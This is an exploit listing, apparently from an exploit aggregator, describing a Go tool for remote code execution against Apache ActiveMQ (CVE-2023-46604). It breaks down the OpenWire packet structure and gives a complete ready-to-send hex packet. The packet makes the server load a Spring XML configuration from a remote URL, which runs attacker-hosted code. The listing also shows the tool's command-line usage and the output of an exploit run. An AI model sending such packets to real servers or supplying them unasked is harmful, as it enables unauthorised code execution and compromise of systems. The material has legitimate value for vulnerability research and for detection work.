## https://sploitus.com/exploit?id=E5B5BEE1-1450-5A9D-AB5A-A28171F60645
# ActiveMQ-RCE
ActiveMQ RCE (CVE-2023-46604) exploit, written in Golang
Some detailed analysis reports
[https://exp10it.io/2023/10/apache-activemq-็ๆฌ-5.18.3-rce-ๅๆ](https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/)
[https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis](https://attackerkb.com/topics/IHsgZDE3tS/cve-2023-46604/rapid7-analysis)
## OpenWire Protocol Analysis
Refer to the official documentation and Wireshark for a simple analysis of the OpenWire Protocol
[https://activemq.apache.org/openwire-version-2-specification](https://activemq.apache.org/openwire-version-2-specification)
A simple ActiveMQ RCE packet is as follows
```
000000701f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001d687474703a2f2f3132372e302e302e313a383030302f706f632e786d6c
```
We can divide it into two parts: header and body
header
```
+----------------------------------------------------------------------------------+
| Packet Length | Command | Command Id | Command response required | CorrelationId |
|---------------|---------|------------|---------------------------|---------------|
| 00000070 | 1f | 00000000 | 00 | 00000000 |
+----------------------------------------------------------------------------------+
```
Packet Length: length of body part / 2
Command: Command Type Identifier, `1f` corresponds to ExceptionResponse
Command Id: As the name suggests. Here we fill it with zero
Command response required: whether a response is required
CorrelationId: As the name suggests. Here we fill it with zero
body
```
+--------------------------------------------------------------------------------------+
| not-null | not-null | classname-size | classname | not-null | message-size | message |
|----------|----------|----------------|-----------|----------|--------------|---------|
| 01 | 01 | 0042 | ..... | 01 | 001d | ..... |
+--------------------------------------------------------------------------------------+
```
The `not-null` at the beginning is `01`, which means that the entire body part is not empty, and every three parts after that represent a String type
`not-null` means that the string `classname` is not empty, and then follow its length and hex content. The same goes for `message`.
You can refer to the schematic diagram given in the official document.
String Type Encoding
```
[=If not-null is 1===========]
+----------+ [ +-------+----------------+ ]
| not-null | [ | size | encoded-string | ]
+----------+ [ +-------+----------------+ ]
| byte | [ | short | size octects | ]
+----------+ [ +-------+----------------+ ]
[============================]
```
Throwable Type Encoding
```
[=If not-null is 1===========================================================================]
[ [=If StackTraceEnabled option is enabled.==================] ]
[ [ [=Repeated size times======================] ] ]
+----------+ [ +----------------+---------+ [ +-------+ [ +--------+--------+--------+-------------+ ] ] ]
| not-null | [ | exception-name | message | [ | size | [ | class | method | file | line-number | ] ] ]
+----------+ [ +----------------+---------+ [ +-------+ [ +--------+--------+--------+-------------+ ] ] ]
| byte | [ | string | string | [ | short | [ | string | string | string | int | ] ] ]
+----------+ [ +----------------+---------+ [ +-------+ [ +--------+--------+--------+-------------+ ] ] ]
[ [ [============================================] ] ]
[ [==========================================================] ]
[============================================================================================]
```
## Usage
usage
```bash
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
Usage of ./ActiveMQ-RCE:
-i string
ActiveMQ Server IP or Host
-p string
ActiveMQ Server Port (default "61616")
-u string
Spring XML Url
```
exploit
```bash
$ ./ActiveMQ-RCE -i 127.0.0.1 -u http://127.0.0.1:8000/poc.xml
_ _ _ __ __ ___ ____ ____ _____
/ \ ___| |_(_)_ _____| \/ |/ _ \ | _ \ / ___| ____|
/ _ \ / __| __| \ \ / / _ \ |\/| | | | |_____| |_) | | | _|
/ ___ \ (__| |_| |\ V / __/ | | | |_| |_____| _ <| |___| |___
/_/ \_\___|\__|_| \_/ \___|_| |_|\__\_\ |_| \_\\____|_____|
[*] Target: 127.0.0.1:61616
[*] XML URL: http://127.0.0.1:8000/poc.xml
[*] Sending packet: 000000701f000000000000000000010100426f72672e737072696e676672616d65776f726b2e636f6e746578742e737570706f72742e436c61737350617468586d6c4170706c69636174696f6e436f6e7465787401001d687474703a2f2f3132372e302e302e313a383030302f706f632e786d6c
```
If you just want to simply detect whether there is a vulnerability, you can change the spring xml url to the dnslog address.